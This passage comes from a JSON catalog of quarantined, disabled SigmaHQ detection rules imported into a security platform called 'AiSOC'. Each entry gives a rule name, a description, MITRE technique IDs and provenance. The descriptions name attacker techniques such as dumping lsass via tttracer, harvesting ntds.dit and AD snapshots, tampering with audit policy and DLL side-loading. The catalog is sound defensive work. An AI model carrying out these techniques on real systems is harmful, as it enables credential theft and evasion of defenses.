"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-malicious-appx-package-installation-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml" } }, { "id": "sigmahq-sigma-0a1255c5-d732-4b62-ac02-b5152d34fb83", "type": "detection", "name": "ADExplorer Writing Complete AD Snapshot Into .dat File", "description": "Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. 
The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1069.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adexplorer-writing-complete-ad-snapshot-into-dat-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a1255c5-d732-4b62-ac02-b5152d34fb83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_adexplorer_dump_written.yml" } }, { "id": "sigmahq-sigma-0a13e132-651d-11eb-ae93-0242ac130002", "type": "detection", "name": "Audit Policy Tampering Via Auditpol", "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audit-policy-tampering-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a13e132-651d-11eb-ae93-0242ac130002", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_auditpol_susp_execution.yml" } }, { "id": "sigmahq-sigma-0a1f9d29-6465-4776-b091-7f43b26e4c89", "type": "detection", "name": "Prefetch File Deleted", "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/prefetch-file-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" } }, { "id": "sigmahq-sigma-0a3ff354-93fc-4273-8a03-1078782de5b7", "type": "detection", "name": "Recon Activity via SASec", "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/recon-activity-via-sasec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"0a3ff354-93fc-4273-8a03-1078782de5b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" } }, { "id": "sigmahq-sigma-0a4f6091-223b-41f6-8743-f322ec84930b", "type": "detection", "name": "Suspicious GUP Usage", "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-gup-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a4f6091-223b-41f6-8743-f322ec84930b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gup_suspicious_execution.yml" } }, { "id": "sigmahq-sigma-0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", "type": "detection", "name": "AWS IAM Backdoor Users Keys", "description": "Detects creation of an AWS IAM access key for one user by a different principal.\nA key planted on an existing user gives an attacker persistent API access without creating a new identity; expect benign hits when administrators provision keys for other users, so tune on the acting principal.\nThe same alert also gives visibility into how access keys are issued across the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/aws-iam-backdoor-users-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml" } }, { "id": "sigmahq-sigma-0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "type": "detection", "name": "Uncommon Userinit Child Process", "description": "Detects uncommon \"userinit.exe\" child processes, which could be a sign of uncommon shells or login scripts used for persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1037.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-userinit-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml" } }, { "id": "sigmahq-sigma-0a99eb3e-1617-41bd-b095-13dc767f3def", "type": "detection", "name": "HackTool - Jlaive In-Memory Assembly Execution", "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-jlaive-in-memory-assembly-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a99eb3e-1617-41bd-b095-13dc767f3def", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml" } }, { "id": "sigmahq-sigma-0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", "type": "detection", "name": "Privileged User Has Been Created", "description": "Detects the addition of a new user to a privileged group such as \"root\" or \"sudo\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/privileged-user-has-been-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_privileged_user_creation.yml" } }, { "id": "sigmahq-sigma-0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "type": "detection", "name": "HackTool - Koh Default Named Pipe", "description": "Detects creation of default named pipes used by the Koh tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"critical", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-koh-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_koh_default_pipe.yml" } }, { "id": "sigmahq-sigma-0adfbc14-0ed1-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher - PowerShell", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" } }, { "id": "sigmahq-sigma-0afbd410-de03-4078-8491-f132303cb67d", "type": "detection", "name": "Renamed NetSupport RAT Execution", "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport 
RAT) via Imphash, Product and OriginalFileName strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-netsupport-rat-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0afbd410-de03-4078-8491-f132303cb67d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" } }, { "id": "sigmahq-sigma-0afecb6e-6223-4a82-99fb-bf5b981e92a5", "type": "detection", "name": "Remote Access Tool - ScreenConnect Temporary File", "description": "Detects the creation of files in a specific location by ScreenConnect RMM.\nScreenConnect has feature to remotely execute binaries on a target machine. 
These binaries will be dropped to \"<drive>:\\Users\\<username>\\Documents\\ConnectWiseControl\\Temp\\\" before execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-temporary-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0afecb6e-6223-4a82-99fb-bf5b981e92a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml" } }, { "id": "sigmahq-sigma-0b0cd537-fc77-4e6e-a973-e53495c1083d", "type": "detection", "name": "Renamed Office Binary Execution", "description": "Detects the execution of a renamed office binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-office-binary-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml" } }, { "id": 
"sigmahq-sigma-0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "type": "detection", "name": "Microsoft Defender Blocked from Loading Unsigned DLL", "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-defender-blocked-from-loading-unsigned-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" } }, { "id": "sigmahq-sigma-0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "type": "detection", "name": "Time Travel Debugging Utility Usage", "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/time-travel-debugging-utility-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" } }, { "id": "sigmahq-sigma-0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", "type": "detection", "name": "Guest User Invited By Non Approved Inviters", "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/guest-user-invited-by-non-approved-inviters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml" } }, { "id": 
"sigmahq-sigma-0b7163dc-7eee-4960-af17-c0cd517f92da", "type": "detection", "name": "Service Started/Stopped Via Wmic.EXE", "description": "Detects usage of wmic to start or stop a service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-started-stopped-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b7163dc-7eee-4960-af17-c0cd517f92da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml" } }, { "id": "sigmahq-sigma-0b7889b4-5577-4521-a60a-3376ee7f9f7b", "type": "detection", "name": "WMI Persistence", "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/wmi/win_wmi_persistence.yml" } }, { "id": "sigmahq-sigma-0b80ade5-6997-4b1d-99a1-71701778ea61", "type": "detection", "name": "Imports Registry Key From an ADS", "description": "Detects regedit.exe importing registry data from an NTFS alternate data stream (ADS), a technique used to hide the imported content from casual file inspection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/imports-registry-key-from-an-ads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" } }, { "id": "sigmahq-sigma-0b8baa3f-575c-46ee-8715-d6f28cc7d33c", "type": "detection", "name": "NTDS.DIT Created", "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntds-dit-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b8baa3f-575c-46ee-8715-d6f28cc7d33c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml" } }, { "id": "sigmahq-sigma-0b9ad457-2554-44c1-82c2-d56a99c42377", "type": "detection", "name": "Anydesk Temporary Artefact", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anydesk-temporary-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" } }, { "id": "sigmahq-sigma-0ba1da6d-b6ce-4366-828c-18826c9de23e", "type": "detection", "name": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", 
"category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-via-rename-of-highly-relevant-binaries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" } }, { "id": "sigmahq-sigma-0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "type": "detection", "name": "Control Panel Items", "description": "Detects the malicious use of a control panel item", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.002", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/control-panel-items.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_control_panel_item.yml" } }, { "id": "sigmahq-sigma-0badd08f-c6a3-4630-90d3-6875cca440be", "type": "detection", "name": "User Logoff Event", "description": "Detects a user log-off activity. 
Could be used for example to correlate information during forensic investigations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-logoff-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0badd08f-c6a3-4630-90d3-6875cca440be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_logoff.yml" } }, { "id": "sigmahq-sigma-0bb4bbeb-fe52-4044-b40c-430a04577ebe", "type": "detection", "name": "Potentially Suspicious File Download From ZIP TLD", "description": "Detects the download of a file with a potentially suspicious extension from a .zip top level domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-file-download-from-zip-tld.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0bb4bbeb-fe52-4044-b40c-430a04577ebe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml" } }, { "id": 
"sigmahq-sigma-0bbc6369-43e3-453d-9944-cae58821c173", "type": "detection", "name": "Execution via WorkFolders.exe", "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-via-workfolders-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0bbc6369-43e3-453d-9944-cae58821c173", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" } }, { "id": "sigmahq-sigma-0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "type": "detection", "name": "Adwind RAT / JRAT File Artifact", "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adwind-rat-jrat-file-artifact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_mal_adwind.yml" } }, { "id": "sigmahq-sigma-0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "type": "detection", "name": "Suspicious Get-Variable.exe Creation", "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-variable-exe-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_get_variable.yml" } }, { "id": "sigmahq-sigma-0c46d4f4-a2bf-4104-9597-8d653fc2bb55", "type": "detection", "name": "GitHub Repository Pages Site Changed to Public", "description": "Detects when a GitHub Pages site of a repository is made public. 
